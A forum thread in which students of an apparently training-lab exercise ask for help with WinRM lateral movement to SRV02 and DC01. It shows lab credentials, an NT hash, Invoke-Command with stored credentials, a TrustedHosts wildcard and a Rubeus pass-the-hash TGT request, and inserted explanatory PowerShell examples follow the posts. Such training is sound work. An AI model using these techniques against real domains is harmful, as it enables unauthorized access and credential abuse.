Question About Windows Lateral Movement => Windows Remote Management (WinRM) => DC01 (question 3)

Hi, everyone,
I have been stuck on question 3, connecting to DC01 as Leonvqz, for 3 days.
I can connect or execute commands from SRV02 (in evil-winrm, or over RDP with WinRM using Rubeus and Leonvqz's hash), but I cannot execute any command as Leonvqz due to the double hop; I can only use Invoke-Command with:

PS C:\Tools> $username = "INLANEFREIGHT\Helen"
PS C:\Tools> $password = "RedRiot88"
PS C:\Tools> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\Tools> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
PS C:\Tools> Invoke-Command -ComputerName DC01 -Credential $credential -ScriptBlock { whoami; hostname }

I also ran this command on SRV02:

Set-Item WSMan:localhost\client\trustedhosts -value * -Force

I am connecting to SRV02 with evil-winrm using Leonvqz's hash, and also over RDP with Rubeus.exe to create a TGT session, but because of the double hop in WinRM I cannot use PSSession, and I do not have Leonvqz's credentials.

I understand the connection to DC01 from SRV02, but I am stuck; if someone can help,

thank you very much.
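The behaviour described in the post is the WinRM "double hop": the remote session on SRV02 holds no delegable Kerberos ticket, so a nested connection to DC01 from inside that session is refused unless a credential is supplied explicitly for the second hop. The following is an added example (not from the post or the lab material) that shows both outcomes side by side; it assumes the host names SRV02 and DC01 and the INLANEFREIGHT\Helen account from the thread, and prompts for the password rather than embedding it.

```powershell
# Added example (not from the original post): observe the WinRM double-hop
# problem and the workaround the thread uses, i.e. passing an explicit
# PSCredential into the nested Invoke-Command.
# Assumed: hosts SRV02 and DC01 and account INLANEFREIGHT\Helen from the thread.
$cred = Get-Credential -UserName 'INLANEFREIGHT\Helen' -Message 'Password for Helen'

Invoke-Command -ComputerName SRV02 -Credential $cred -ScriptBlock {
    "First hop: $(whoami) on $(hostname)"

    # Second hop WITHOUT credentials: the session on SRV02 has no
    # forwardable ticket for Helen, so DC01 rejects the connection.
    try {
        Invoke-Command -ComputerName DC01 -ScriptBlock { hostname } -ErrorAction Stop
    } catch {
        "Second hop without credentials failed: $($_.Exception.Message)"
    }

    # Second hop WITH credentials, pulled from the caller's scope with $using:.
    # DC01 performs a fresh logon for Helen, so no delegation is required.
    Invoke-Command -ComputerName DC01 -Credential $using:cred -ScriptBlock {
        "Second hop: $(whoami) on $(hostname)"
    }
}
```

Passing the credential explicitly is the least-privilege way around the double hop: it works without enabling CredSSP or configuring Kerberos delegation on SRV02, both of which widen what a compromised first-hop host can reach. It also only works for an account whose password (or an equivalent PSCredential) is available, which is exactly the constraint the post runs into.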

It's OK, I solved it. If you have any questions, DM me.

Hi @linuxoid92120, I have a question.
I'm stuck at the 2nd question: “Connect to the target machine using Helen's Credentials, from there, use Leonvqz hash A35289033D176ABAAF6BEAA0AA681400 to connect to SRV02 and read the flag located at”.

My step by step:

  1. PS C:\Tools> $username = "INLANEFREIGHT\Helen"
  2. PS C:\Tools> $password = "RedRiot88"
  3. PS C:\Tools> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  4. PS C:\Tools> $credential = New-Object System.Management.Automation.PSCredential ($username, $securePassword)
  5. PS C:\Tools> Enter-PSSession $sessionSRV02
  6. .\Rubeus.exe asktgt /user:leonvqz /rc4:3223DS033D176ABAAF6BEAA0AA681400 /nowrap

After that, .\Rubeus.exe shows me the following error:

[*] Action: Ask TGT

[*] Got domain: inlanefreight.local
[*] Using rc4_hmac hash: 3223DS033D176ABAAF6BEAA0AA681400
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.local\leonvqz'

[!] Unhandled Rubeus exception:

System.FormatException: Additional non-parsable characters are at the end of the string.
at System.ParseNumbers.StringToInt(String s, Int32 radix, Int32 flags, Int32* currPos)
at System.Convert.ToByte(String value, Int32 fromBase)
at System.Linq.Enumerable.WhereSelectEnumerableIterator`2.MoveNext()
at System.Linq.Buffer`1..ctor(IEnumerable`1 source)
at System.Linq.Enumerable.ToArray[TSource](IEnumerable`1 source)
at Rubeus.PA_DATA..ctor(String keyString, KERB_ETYPE etype)
at Rubeus.AS_REQ..ctor(String keyString, KERB_ETYPE etype, Boolean opsec, Boolean pac)
at Rubeus.AS_REQ.NewASReq(String userName, String domain, String keyString, KERB_ETYPE etype, Boolean opsec, Boolean changepw, Boolean pac, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean opsec, String servicekey, Boolean changepw, Boolean pac, String proxyUrl, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Commands.Asktgt.Execute(Dictionary`2 arguments)
at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

Can you help me?
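The stack trace above shows where the exception originates: the /rc4: string is cut into two-character pairs and each pair is passed to Convert.ToByte(value, 16), which throws exactly this FormatException when a pair contains a character outside 0-9 and A-F. As an added example (not from the post or from Rubeus), a small PowerShell check that reproduces that conversion step and reports the first pair that cannot be parsed; the input values are constructed for the demonstration, with the first taken from the error output quoted above.

```powershell
# Added example (not from the post or Rubeus): replay the per-pair
# Convert.ToByte(pair, 16) step that the stack trace shows and report
# which two-character pair of an RC4/NT hash string is not hexadecimal.
function Test-Rc4HashString {
    param([Parameter(Mandatory)][string]$Hash)

    # An RC4/NT hash is 16 bytes, i.e. exactly 32 hex characters.
    if ($Hash.Length -ne 32) {
        return "Invalid: expected 32 hex characters, got $($Hash.Length)"
    }
    for ($i = 0; $i -lt $Hash.Length; $i += 2) {
        $pair = $Hash.Substring($i, 2)
        try {
            # Same conversion Rubeus performs; a non-hex character in the pair
            # raises "Additional non-parsable characters are at the end of the string."
            [void][Convert]::ToByte($pair, 16)
        } catch [System.FormatException] {
            return "Invalid: pair '$pair' at offset $i is not hexadecimal ($($_.Exception.Message))"
        }
    }
    return 'OK: well-formed 16-byte RC4/NT hash string'
}

# Constructed inputs: the value from the quoted error output, and an
# all-hex placeholder (not a real hash) for comparison.
Test-Rc4HashString '3223DS033D176ABAAF6BEAA0AA681400'
Test-Rc4HashString '00112233445566778899AABBCCDDEEFF'
```

Running the check before handing a hash string to any tool turns an unhandled exception deep in a stack trace into a one-line message naming the offending pair and offset, which is usually enough to spot a copy-paste or transcription slip.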